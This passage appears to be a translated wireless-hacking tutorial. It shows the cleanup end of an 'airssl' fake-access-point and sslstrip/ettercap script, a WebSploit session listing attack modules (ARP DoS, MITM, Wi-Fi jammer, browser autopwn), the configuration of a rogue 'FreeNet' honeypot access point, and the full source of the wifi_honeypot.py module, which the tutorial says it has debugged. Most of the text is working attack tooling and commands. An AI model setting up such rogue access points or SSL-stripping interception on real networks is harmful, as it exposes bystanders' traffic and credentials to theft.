echo "After you have finished please close airssl and clean up properly by hitting Y, if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    # restores the original state
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
fi
exit |
= It opens new windows and closes them for you; it is written very conveniently. You only need to enter the inputs correctly.
[Reference] An easy way to build a FakeAP (websploit)
# websploit /* a framework specialised in web-side attacks
--=[WebSploit FrameWork
+---**---==[Version :2.0.5 BETA
+---**---==[Codename :We're Not Crying Wolf
+---**---==[Available Modules : 19
--=[Update Date : [r2.0.5-000 2.3.2014]
wsf > show modules
Web Modules                     Description
-------------------             ---------------------
web/apache_users                Scan Directory Of Apache Users
web/dir_scanner                 Directory Scanner
web/wmap                        Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                         PHPMyAdmin Login Page Scanner
web/cloudflare_resolver         CloudFlare Resolver

Network Modules                 Description
-------------------             ---------------------
network/arp_dos                 ARP Cache Denial Of Service Attack
network/mfod                    Middle Finger Of Doom Attack
network/mitm                    Man In The Middle Attack
network/mlitm                   Man Left In The Middle Attack
network/webkiller               TCP Kill Attack
network/fakeupdate              Fake Update Attack Using DNS Spoof
network/arp_poisoner            Arp Poisoner

Exploit Modules                 Description
-------------------             ---------------------
exploit/autopwn                 Metasploit Autopwn Service
exploit/browser_autopwn         Metasploit Browser Autopwn Service
exploit/java_applet             Java Applet Attack (Using HTML)

Wireless / Bluetooth Modules    Description
-------------------             ---------------------
wifi/wifi_jammer                Wifi Jammer
wifi/wifi_dos                   Wifi Dos Attack
wifi/wifi_honeypot              Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod         Bluetooth Ping Of Death Attack
wsf > use wifi/wifi_honeypot
wsf:Wifi_Honeypot > show options
Options         Value                   RQ      Description
---------       --------------          ----    --------------
interface       wlan0                   yes     Wireless Interface Name
essid           FreeNet                 yes     FakeAP Essid
channel         9                       yes     FakeAP Channel
mac             a1:a2:a3:a4:a5:a6       yes     FakeAP Mac Address
output          /tmp/10.txt             yes     Log File Location       /* where the log is saved
mon             mon0                    yes     Monitor Mod(default)    /* adapter name
encrypt         1                       yes     Type Of Encryptions

Numbers         Encryptions
-------         --------------
1               Unencrypted
2               wep
3               wpa
4               wpa2
wsf:Wifi_Honeypot > run
.... (omitted) ..... |
(Run these commands if needed)
wsf> <CTRL + Z>
# kill %1
(Phone) Check for the wireless AP on the phone.
# cd /usr/share/websploit
# ls
core/ modules/ |
# cd modules
# ls
__init__.py        bluetooth_pod.pyc        mfod.py          wifi_dos.py
__init__.pyc       brow_autopwn.py          mfod.pyc         wifi_dos.pyc
apache_users.py    brow_autopwn.pyc         mitm.py          wifi_honeypot.py
apache_users.pyc   cloudflare_resolver.py   mitm.pyc         wifi_honeypot.pyc
arp_dos.py         cloudflare_resolver.pyc  mlitm.py         wifi_honeypot2.py
arp_dos.pyc        db_autopwn.rb            mlitm.pyc        wifi_jammer.py
arp_poisoner.py    directory_scanner.py     phpmyadmin.py    wifi_jammer.pyc
arp_poisoner.pyc   directory_scanner.pyc    phpmyadmin.pyc   wmap.py
autopwn.py         fakeupdate/              thebiz.py        wmap.pyc
autopwn.pyc        java_applet.py           webkiller.py
bluetooth_pod.py   java_applet.pyc          webkiller.pyc |
- The modules are written as Python scripts.
# vi wifi_honeypot.py
#!/usr/bin/env python
#
# WebSploit Framework Wifi Honeypot (Fake Access Point) module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from time import sleep
from core import help
from core import wcolors

options = ["wlan0", "FreeNet", "9", "a1:a2:a3:a4:a5:a6", "/home/wh_logs.txt", "mon0", "1"]   # default values


def wifi_honeypot():   # function definition: one interactive prompt loop, re-entered recursively
    try:
        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
        line_1 += ":"
        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wifi_Honeypot" + wcolors.color.ENDC
        line_1 += " > "
        com = raw_input(line_1)
        com = com.lower()
        if com[0:13] == 'set interface':
            options[0] = com[14:20]
            print "INTERFACE => ", options[0]
            wifi_honeypot()
        elif com[0:9] == 'set essid':
            options[1] = com[10:]
            print "ESSID => ", options[1]
            wifi_honeypot()
        elif com[0:11] == 'set channel':
            options[2] = com[12:14]
            print "CHANNEL => ", options[2]
            wifi_honeypot()
        elif com[0:7] == 'set mac':
            options[3] = com[8:25]
            print "MAC => ", options[3]
            wifi_honeypot()
        elif com[0:10] == 'set output':
            options[4] = com[11:]
            print "OUTPUT => ", options[4]
            wifi_honeypot()
        elif com[0:7] == 'set mon':
            options[5] = com[8:12]
            print "MON => ", options[5]
            wifi_honeypot()
        elif com[0:11] == 'set encrypt':
            options[6] = com[12:13]
            print "ENCRYPT => ", options[6]
            wifi_honeypot()
        elif com[0:2] == 'os':
            os.system(com[3:])
            wifi_honeypot()
        elif com[0:4] == 'help':
            help.help()
            wifi_honeypot()
        elif com[0:4] == 'back':
            pass
        elif com[0:12] == 'show options':   # option parsing / display section
            print ""
            print "Options\t\t Value\t\t\t\t RQ\t Description"
            print "---------\t--------------\t\t\t----\t--------------"
            print "interface\t" + options[0] + "\t\t\t\tyes\tWireless Interface Name"
            print "essid\t\t" + options[1] + "\t\t\t\tyes\tFakeAP Essid"
            print "channel\t\t" + options[2] + "\t\t\t\tyes\tFakeAP Channel"
            print "mac\t\t" + options[3] + "\t\tyes\tFakeAP Mac Address"
            print "output\t\t" + options[4] + "\t\tyes\tLog File Location"
            print "mon\t\t" + options[5] + "\t\t\t\tyes\tMonitor Mod(default)"
            print "encrypt\t\t" + options[6] + "\t\t\t\tyes\tType Of Encryptions"
            print "\n"
            print "Numbers\t\t Encryptions"
            print "-------\t\t--------------"
            print "1\t\t Unencrypted"
            print "2\t\t wep"
            print "3\t\t wpa"
            print "4\t\t wpa2"
            print ""
            wifi_honeypot()
        elif com[0:3] == 'run':
            # Build the airbase-ng command line for each encryption choice.
            # Corrected here: the original used "% str(a, b, c, d, e)" and "-c %d" with
            # string values, which raises TypeError before the command is ever run.
            args = (options[3], options[2], options[1], options[5], options[4])
            comm1 = "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" % args
            # comm2= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
            comm2 = "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" % args
            comm3 = "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -z 2 %s > %s &" % args
            comm4 = "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -Z 4 %s > %s &" % args
            # Corrected here: the original passed options[1] (the ESSID) to airmon-ng
            # instead of options[0] (the wireless interface).
            monit_mod_start = "airmon-ng start %s" % str(options[0])
            print(wcolors.color.GREEN + "[*]Enable monitor mod on your interface [%s] ..." + wcolors.color.ENDC) % (options[0]),
            subprocess.Popen(monit_mod_start, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            print(wcolors.color.GREEN + " [OK]" + wcolors.color.ENDC)
            print(wcolors.color.GREEN + "[*]Creating Fake Access Point ..." + wcolors.color.ENDC),
            # Corrected here: options[6] is a string, so it is compared against '1'..'4'
            # (the original compared against the integers 1..4 and never matched).
            if options[6] == '1':
                os.system(comm1)
            elif options[6] == '2':
                os.system(comm2)
            elif options[6] == '3':
                os.system(comm3)
            elif options[6] == '4':
                os.system(comm4)
            else:
                print(wcolors.color.RED + "[!]Error : Encryption ID not Found!" + wcolors.color.ENDC)
                pass
            sleep(2)
            print(wcolors.color.GREEN + " [OK]" + wcolors.color.ENDC)
            wifi_honeypot()
        elif com[0:4] == 'stop':
            os.system("killall xterm")
            os.system("killall airbase-ng")
            wifi_honeypot()
        else:
            print "Wrong Command => ", com
            wifi_honeypot()
    except(KeyboardInterrupt):
        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC) |
[Reference] Wireless hacking on Windows
http://www.youtube.com/watch?v=CK99BpKVgCE
Common View for WIFI + Aircrack-ng GUI
WEP/WPA/WPA2
[Reference] YouTube search terms
- wifi hacking
- sslstrip
- soft AP
- airbase-ng